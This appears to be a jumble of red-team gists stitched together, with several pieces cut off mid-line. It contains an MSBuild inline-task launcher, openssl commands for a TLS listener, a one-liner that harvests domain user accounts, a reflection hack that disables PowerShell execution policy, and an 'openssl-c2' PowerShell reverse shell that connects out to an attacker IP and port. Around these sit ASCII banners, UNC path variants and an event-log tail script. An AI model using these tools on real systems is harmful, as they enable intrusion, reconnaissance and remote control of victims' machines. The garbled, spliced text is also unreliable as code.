
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<!-- Runs the two inline tasks in order. Their C# bodies are presumably supplied by the UsingTask
     declarations that follow (cut off below); as the header comment says, that code is compiled and
     executed by msbuild.exe itself when this project file is built, which is why the file is passed
     directly to msbuild.exe rather than to a compiler. -->
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
# Self-signed RSA-4096 certificate valid for 365 days. -nodes leaves key.pem unencrypted
# (no passphrase prompt), so the file itself is the only protection on the private key.
openssl req -x509 -nodes -days 365 -newkey rsa:4096 -keyout key.pem -out cert.pem
# TLS listener on port 9876 backed by that key pair; -quiet suppresses the server's
# informational output.
openssl s_server -quiet -port 9876 -key key.pem -cert cert.pem
REM Written for an interactive cmd prompt (single-% FOR variables); inside a .bat file these would need %%a.
REM Start clean: silently remove the scratch files the steps below append to.
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
REM Step 1: capture `net users /domain`, skipping the 6 header lines and the trailing "The command c..." line.
REM `%^line: =,%` replaces every space with a comma; the `^` plus `call` defer the expansion so it
REM happens per iteration rather than once when the line is parsed. Rows land in 1.txt.
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt
REM Step 2: second substitution pass, ", " -> ",", on each row of 1.txt into 2.txt.
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
REM Step 3: split each row on commas (consecutive delimiters collapse) into up to 3 tokens and write
REM one per line to 3.txt. Rows with fewer than 3 names leave %o/%p empty, so `echo` presumably
REM prints its status line ("ECHO is on.") for them.
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
REM Step 4: drop those filler lines; users.txt ends up with one account name per line.
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
clr2of8 / bypassPowershellExecutionPolicy.ps1
Created October 24, 2020 22:03
bypass powershell execution policy
# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
# Uses reflection over two non-public fields: reads the execution context's "_context" and
# replaces its "_authorizationManager" with a fresh default AuthorizationManager, so the
# current session's execution-policy check no longer applies. Execution policy is a safety
# feature rather than a security boundary (Microsoft's about_Execution_Policies says it is
# not a security system that restricts user actions); controls enforced outside that check
# (application control, logging) are not touched here — NOTE(review): confirm against the
# environment's own configuration before relying on either.
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}
# Applies the change to the current session immediately.
Disable-ExecutionPolicy
function openssl-c2 ($ip,$port,$domain="fake.domain") {
$socket = New-Object Net.Sockets.TcpClient($ip, $port)
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient($domain, $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
# Fully Qualified DOS Paths (begin with a drive letter, a volume separator, and a component separator)
c:\Windows\System32\notepad.exe
# UNC Paths (begin with two separators without a question mark or period following)
\\127.0.0.1\c$\Windows\System32\notepad.exe
\\LOCALHOST\c$\Windows\System32\notepad.exe
\\::1\c$\Windows\System32\notepad.exe
\\0:0:0::1\c$\Windows\System32\notepad.exe
\\127.0.0.1\admin$\System32\notepad.exe
\\DESKTOP-MH8DLT1\admin$\System32\notepad.exe
# Banner text. A double-quoted here-string keeps the spacing exactly as written
# (the art contains no `$`, so nothing is expanded) and the closing "@ must sit at column 0.
$art = @"
__________ _________.__ .__ .__ _____ .___ _____ _________
\______ \______ _ __ ___________/ _____/| |__ ____ | | | | _/ ____\___________ | | _____/ ____\____ / _____/ ____ ____
| ___/ _ \ \/ \/ // __ \_ __ \_____ \ | | \_/ __ \| | | | \ __\/ _ \_ __ \ | |/ \ __\/ _ \\_____ \_/ __ \_/ ___\
| | ( <_> ) /\ ___/| | \/ \| Y \ ___/| |_| |__ | | ( <_> ) | \/ | | | \ | ( <_> ) \ ___/\ \___
|____| \____/ \/\_/ \___ >__| /_______ /|___| /\___ >____/____/ |__| \____/|__| |___|___| /__| \____/_______ /\___ >\___ >
\/ \/ \/ \/ \/ \/ \/ \/
"@
# Print the banner to the host in cyan.
Write-Host -ForegroundColor Cyan -Object $art
clr2of8 / Watch-EventLogTail.ps1
Created September 11, 2022 01:45 — forked from LeeHolmes/Watch-EventLogTail.ps1
Tail an event log through PowerShell
## PowerShell Eventing lets you tail an event log:
## http://powershellcookbook.com/recipe/IMyz/respond-to-automatically-generated-events
$watcher = New-Object System.Diagnostics.Eventing.Reader.EventLogWatcher "Microsoft-Windows-PowerShell/Operational"
Register-ObjectEvent $watcher EventRecordWritten -Action {
$event = $eventArgs.EventRecord
if($event.ProcessId -ne $pid)
{
## Save the last event into a variable in the PowerShell sesssion if you want to explore its properties,
## as the eventing actions run in their own runspace
# $GLOBAL:lastEvent = $event
$art = @"
,ggg, ,ggggggggggg, ,ggggggggggggggg
dP""8I I8 dP"""88""""""Y8, 8I dP""""""88"""""""
dP 88 I8 Yb, 88 `8b 8I Yb,_ 88
dP 88 88888888 gg `" 88 ,8P 8I `"" 88
,8' 88 I8 "" 88aaaad8P" 8I 88
d88888888 I8 ,ggggg, ,ggg,,ggg,,ggg, gg ,gggg, 88""""Yb, ,ggg, ,gggg,8I 88 ,ggg, ,gggg,gg ,ggg,,ggg,,ggg,
__ ,8" 88 I8 dP" "Y8ggg,8" "
@echo off
REM Required for the !var! expansions used later (!Second:~0,-1!, !Second:~-2!): they are
REM evaluated each time the line runs inside the FOR /L loop below, not once when the
REM parenthesised block is parsed, so values set by `set %%a` are visible.
SETLOCAL EnableDelayedExpansion
FOR /L %%L IN (0,0,1) DO @(
REM get UTC times modified from: https://stackoverflow.com/questions/9871499/how-to-get-utc-time-with-windows-batch-file
for /f %%a in ('wmic Path Win32_UTCTime get Year^,Month^,Day^,Hour^,Minute^,Second /Format:List ^| findstr "="') do (
set %%a
)
Set Second=0!Second:~0,-1!
Set Second=!Second:~-2!